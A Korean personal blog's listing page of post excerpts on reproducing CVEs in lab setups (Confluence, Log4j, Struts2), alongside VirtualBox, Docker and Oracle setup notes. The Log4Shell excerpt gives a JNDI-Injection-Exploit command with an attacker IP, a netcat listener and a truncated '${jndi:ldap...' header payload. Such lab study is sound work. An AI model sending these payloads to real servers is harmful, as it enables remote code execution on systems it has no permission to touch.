목록# 나/exploit CVE (35)

의미없는 블로그

[CVE-2022-26134] Atlassian Confluence RCE 취약점

환경구축 : https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 PoC : https://github.com/h3v0x/CVE-2022-26134/blob/main/exploit.py docker-compose 명령어 설치해서(https://saltlee.tistory.com/76) docker-compose.yml 파일로 환경구축(버전 7.13.6) 컨테이너 띄운다음에 Confluence Datacenter 로 했고 DB만 저기 내용대로 설정했다 테스트는 버프로 해도 되고 python 으로 날려도 되고 https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis..
# 나/exploit CVE 2022. 6. 14. 15:15
[CVE-2021-44228] Apache Log4j RCE 취약점

[Victim 서버 구축(도커)] https://github.com/christophetd/log4shell-vulnerable-app [공격자(칼리)] 아래 exploit 다운받고 자바는 1.8 이어야 함.. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "victim 에서 실행할 명령어" -A "공격자 IP" 이거 보내면 Vicim의 JDK 버전에 따라 무슨 페이로드 보낼건지 뜨는데 Victim이 JDK1.8 이라고 한다 그래서 저기 빨간 네모박스 페이로드 보낼거임.. Victim 에다가 nc 4444 보냈으니깐 4444 포트로 리스닝 대기 Victim 에다가 HTTP 요청 보내는데 X-Api-Version: ${jndi:ldap//192.168..
# 나/exploit CVE 2021. 12. 14. 14:30
리눅스 Tomcat 설치

# 나/exploit CVE 2020. 12. 1. 09:19
VirtualBox 포트 포워딩 하기 & Putty 글자 크기 키우기

버츄얼박스 CentOS 에 Putty 로 SSH 접속하려고 한다 CentOS 아이피 확인하셈~ VM 설정에서 네트워크 - 포트 포워딩 클릭 Putty 에서 접속할 아이피, 포트 (127.0.0.1 / 2222) 원래 VM 아이피, 포트 (10.0.2.15 / 22) 127.0.0.1 에 2222 로 접속하면 잘 된다~ Putty 글자 크기 키우는 법 ↓↓ test 로 세션 하나 생성하고 Save Appearance - Change 에서 글자 크기 키운다 Save 한번 더 눌러주고 접속하면 됨 커졌다리~ 다음부턴 test 세션 Load 해서 접속하면 됨
# 나/exploit CVE 2020. 8. 21. 10:06
[CVE-2019-0230] Apache Struts2 RCE 취약점

PoC : https://github.com/PrinceFPF/CVE-2019-0230/blob/master/CVE-2019-0230.sh 테스트 환경 : https://saltlee.tistory.com/31?category=842405 (아마 Struts 2.3.10) 영향받는 버전 : Struts 2.0.0 ~ Struts 2.5.20 옛날에 Struts2 취약점 테스트할때 했던거 버전이 맞아서 그냥 그대로 갖다씀 8080(32768) 으로 실행시키면 된다 PoC 는 sh 형태라서 칼리에서 실행시키면 될줄 알았는데 왜이렇게 오류남? 주농책임님이 msys2 라는 프로그램 알려줘서 이걸로 하니까 됐다 다운로드 : https://www.msys2.org/ 설치파일 다운받아서 설치하면 홈 경로 생기는데 여..
# 나/exploit CVE 2020. 8. 20. 16:38
삽질과정

보호되어 있는 글입니다.
# 나/exploit CVE 2020. 6. 1. 13:08
[Docker] Ubuntu 에 Docker 설치

원래 VM 에서 boot2docker.iso 로 설치하면 용량 지정 맘대로 됐는데 왜 갑자기 안되는지 모르겠다 자꾸 800메가로 떠서 걍 우분투에 설치하기로 함 우분투를 한 30기가로 해버렸다 도커 설치 가능한 우분투 버전(OS requirements) : https://docs.docker.com/engine/install/ubuntu/
# 나/exploit CVE 2020. 5. 12. 10:23
[Docker] Oracle 11.2.0.2(11g) 설치

참고 : https://hub.docker.com/r/wnameless/oracle-xe-11g-r2 이미지 다운로드 docker pull wnameless/oracle-xe-11g-r2:latest 컨테이너 생성 docker run -it -d -P --expose="1521" --expose="8080" -e ORACLE_ALLOW_REMOTE=true --name oracle wnameless/oracle-xe-11g-r2:latest 8080(32768) 포트는 관리 Web 콘솔 http://도커아이피:8080/apex/apex_admin 접속 (ADMIN/admin) 직접 쿼리 사용하려면 컨테이너 들어가서 docker exec -u 0 -it oracle /bin/bash su oracle sq..
# 나/exploit CVE 2019. 12. 16. 13:11
Prev 1 2 3 4 5 Next